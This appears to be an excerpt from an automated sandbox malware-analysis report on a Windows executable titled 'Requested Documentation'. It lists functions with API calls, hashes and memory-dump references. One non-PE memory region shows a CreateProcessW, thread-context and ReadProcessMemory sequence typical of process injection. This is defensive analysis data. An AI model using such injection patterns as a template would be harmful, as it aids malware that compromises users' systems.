                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00985821,?,?,?,?), ref: 00985CC7
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00985821,?,?,?,?), ref: 009BDD73
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 995311fa7ab2b9e9a8278e2ef0e922baa078395dd943701c1640f299b5dc6dbc
                                                                              • Instruction ID: f1e17302eacb233b17fd0b6fe331dfba52ae3194edfb12851bb209721dffd1f0
                                                                              • Opcode Fuzzy Hash: 995311fa7ab2b9e9a8278e2ef0e922baa078395dd943701c1640f299b5dc6dbc
                                                                              • Instruction Fuzzy Hash: B6019270244708BEF7245E64CD8AF763BDCAB01768F108319BBE5AA2E0C6B45C4D8F50
                                                                              Function 009A0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              • std::exception::exception.LIBCMT ref: 009A0DEC
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                                • Part of subcall function 009A859B: RaiseException.KERNEL32(?,?,?,00A39E78,00000000,?,?,?,?,009A0E06,?,00A39E78,?,00000001), ref: 009A85F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 56a7943b126f61ca9398eba927dcb239354e2e7d009c3ae2f0c8fd2243ea7190
                                                                              • Instruction ID: 5d8f7960568086cf1fd5036922789705acc5f97d4ccf55521183331cd39461f3
                                                                              • Opcode Fuzzy Hash: 56a7943b126f61ca9398eba927dcb239354e2e7d009c3ae2f0c8fd2243ea7190
                                                                              • Instruction Fuzzy Hash: E3F0A43294031966CF10AAA4EC05BDF77ACEF87311F104865FD08A6291EFB1DA9092D1
                                                                              Function 009A55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
                                                                              • Opcode ID: 64b3411346310648f5f3b7a3dbae1a75feaea29c41495279ce86772f55f0fea7
                                                                              • Instruction ID: 7a6984b1e6e01c59b0342faf032af5e351c3b88815a95b680ff52d681e65d9e1
                                                                              • Opcode Fuzzy Hash: 64b3411346310648f5f3b7a3dbae1a75feaea29c41495279ce86772f55f0fea7
                                                                              • Instruction Fuzzy Hash: 2F01F271900A08EBCF12AF689D06A9F7B71BFD3321F464115F8241B1A1DB318A21DFD1
                                                                              Function 009A53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • __lock_file.LIBCMT ref: 009A53EB
                                                                                • Part of subcall function 009A6C11: __lock.LIBCMT ref: 009A6C34
                                                                              • __fclose_nolock.LIBCMT ref: 009A53F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: fb0187e6533920643eb8f918adb2beb454659d5a84387350529efd915bf9cb29
                                                                              • Instruction ID: 171374b66b016898875cef04160c2fa20de39e2588bbb79a3d8ed606d988dfaa
                                                                              • Opcode Fuzzy Hash: fb0187e6533920643eb8f918adb2beb454659d5a84387350529efd915bf9cb29
                                                                              • Instruction Fuzzy Hash: F4F09631A00A04DADF107B6598057AE76E06FC3374F268504E464AB1C1CFBC49415BD1
                                                                              Function 00988061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0098542F,?,?,?,?,?), ref: 0098807A
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0098542F,?,?,?,?,?), ref: 009880AD
                                                                                • Part of subcall function 0098774D: _memmove.LIBCMT ref: 00987789
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                              • String ID:
                                                                              • API String ID: 3033907384-0
                                                                              • Opcode ID: 3d2913e895289b9f012edbf0c6360259e18af65989b65ace6aef2dc2b11b10d3
                                                                              • Instruction ID: de942481e7e0e9a2e58009e9c96bd7e33a6eb9b73928567a45e55099346acdf4
                                                                              • Opcode Fuzzy Hash: 3d2913e895289b9f012edbf0c6360259e18af65989b65ace6aef2dc2b11b10d3
                                                                              • Instruction Fuzzy Hash: 49018F31201204BEEB24BA61DC4AF7B7B6DEB86360F108029F905DE290DA2098019671
                                                                              Function 0130129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01301ACD
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01301AF1
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01301B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                              • Instruction ID: 0f1a4771fea417e723b9e0f15891666667c944e44923f617d4017eb72a65eacd
                                                                              • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                              • Instruction Fuzzy Hash: AB12CD24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                                              Function 00991FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 35ddff78120573d4e1a8dd67c2df92e8f2cfc1c162c2b6db38620765b2c6a48e
                                                                              • Instruction ID: 2404d2da7b1f53b4ed1c0b9e59dcd09468be69d6e81b0a9c869de760bc730509
                                                                              • Opcode Fuzzy Hash: 35ddff78120573d4e1a8dd67c2df92e8f2cfc1c162c2b6db38620765b2c6a48e
                                                                              • Instruction Fuzzy Hash: 0B517D31A00604AFCF14FB68C991FAE77A6AF89310F15856CF806AB392DA34ED05DB51
                                                                              Function 00985AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00985B96
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 79a2bb10712012e2617449797ad7eae996fac6ea63c3d66785c4550ed32bc13d
                                                                              • Instruction ID: ac64be2c606df516ac5adb7122077f7200a86481e88a11954425b41f305a6208
                                                                              • Opcode Fuzzy Hash: 79a2bb10712012e2617449797ad7eae996fac6ea63c3d66785c4550ed32bc13d
                                                                              • Instruction Fuzzy Hash: 84316131A00A09AFCB18EF6CC480AADF7B5FF94320F168629D81593750D774BD94CB91
                                                                              Function 009BFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: a850029db0792a0e4c031a327480b8832ee8123c614be40d3df220babde3f1cf
                                                                              • Instruction ID: 89a26b569dba49c2aa36a5dace447ae5a32e8a7b2f3400f48e23840a3c017c41
                                                                              • Opcode Fuzzy Hash: a850029db0792a0e4c031a327480b8832ee8123c614be40d3df220babde3f1cf
                                                                              • Instruction Fuzzy Hash: 1441E5745043419FDB24DF14C454B1ABBE1BF89318F1988ACE8998B762C736E845CF92
                                                                              Function 00984DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00984BEF
                                                                                • Part of subcall function 009A525B: __wfsopen.LIBCMT ref: 009A5266
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F
                                                                                • Part of subcall function 00984B6A: FreeLibrary.KERNEL32(00000000), ref: 00984BA4
                                                                                • Part of subcall function 00984C70: _memmove.LIBCMT ref: 00984CBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                              • String ID:
                                                                              • API String ID: 1396898556-0
                                                                              • Opcode ID: 1319efe22567015e8cad56a80a55fea8bb0fe970898c179d0b9b769c45f5eb84
                                                                              • Instruction ID: de3ee2906773a4094edcb24aa98f7d2c4d4dbddd68e1080373919bb7b7dd5d18
                                                                              • Opcode Fuzzy Hash: 1319efe22567015e8cad56a80a55fea8bb0fe970898c179d0b9b769c45f5eb84
                                                                              • Instruction Fuzzy Hash: 3811A731600706ABCF25FF74C856FAE77A9AF84710F108829F545A7282EA7599019B91
                                                                              Function 009BFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: bdab4965a4ec5b9d7974a15cbcf2483cce24268f6f301efd9228cd26a5fa60f6
                                                                              • Instruction ID: 9a1ad245d1419b54edd73a8413872d1d80e863b55f9554b3f3feb9cdc1b7c5fd
                                                                              • Opcode Fuzzy Hash: bdab4965a4ec5b9d7974a15cbcf2483cce24268f6f301efd9228cd26a5fa60f6
                                                                              • Instruction Fuzzy Hash: 67212474908341DFDB24EF64C444B1ABBE0BF89314F09896CF88A97762D731E805CB92
                                                                              Function 0098774D Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 73d0b8cba18bb1d0ddd587b7b1e43a911a5c10eba15cf7c887d481c64711f381
                                                                              • Instruction ID: 5859b36bb18d059fe154abbf1abfb5f1212d9449f161acd5962fffdf099d2faf
                                                                              • Opcode Fuzzy Hash: 73d0b8cba18bb1d0ddd587b7b1e43a911a5c10eba15cf7c887d481c64711f381
                                                                              • Instruction Fuzzy Hash: FB1170722092156BD714BFA8D881E6AF39DEFC9720724452AF919C7391DB31E810C790
                                                                              Function 00985BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,009856A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00985C16
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 0b4eebf8acec3d95156a56f8a401a974978f3c52cb0181315507a04f56929f00
                                                                              • Instruction ID: d90bb0279f53a44f7656e25aeb37bd353f9299742b813d8777983da2b9b2cf52
                                                                              • Opcode Fuzzy Hash: 0b4eebf8acec3d95156a56f8a401a974978f3c52cb0181315507a04f56929f00
                                                                              • Instruction Fuzzy Hash: 92113631200B059FE330DF19C880B62B7E8EF54760F11C92EE9AA87A51D7B0E849CB60
                                                                              Function 009A4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 009A48A6
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
                                                                              • Instruction ID: 4c251109405aa6fb00fd7de54f97c9e2770dfd900b804b5495f3aec55fe3542c
                                                                              • Opcode Fuzzy Hash: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
                                                                              • Instruction Fuzzy Hash: 42F0AF31900649ABDF11AFA89C067AF36A4AFC2325F158414B5249B192DBFC8951DBD1
                                                                              Function 00984E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
                                                                              • Instruction ID: 8de1a2d43242aee3370c48c5348f3a068e785a1431763000efabcb6beaa48cae
                                                                              • Opcode Fuzzy Hash: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
                                                                              • Instruction Fuzzy Hash: 89F03971505712CFCB34AF64E494822BBE5BF553293208A3EE2D786722C7369840DF40
                                                                              Function 009A0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath_memmove
                                                                              • String ID:
                                                                              • API String ID: 2514874351-0
                                                                              • Opcode ID: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
                                                                              • Instruction ID: 6e50e99fd783bb83cd286bea2f85389ae55d5c408ea0db135641519cf78a3291
                                                                              • Opcode Fuzzy Hash: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
                                                                              • Instruction Fuzzy Hash: 74E086369041285BC720E6989C05FEAB79DDBC87A0F0441B5FC08D7205D9609C818690
                                                                              Function 009E8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock
                                                                              • String ID:
                                                                              • API String ID: 2638373210-0
                                                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                              • Instruction ID: a0fd842563c5e9c133ee4e60e0f8b447cbae9f7583b088738060451915f6bcc1
                                                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                              • Instruction Fuzzy Hash: 6BE092B0604B405BD7399A24D800BA373E5AB06304F00081DF6AA83241EB627C418759
                                                                              Function 00985C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,009BDD42,?,?,00000000), ref: 00985C5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
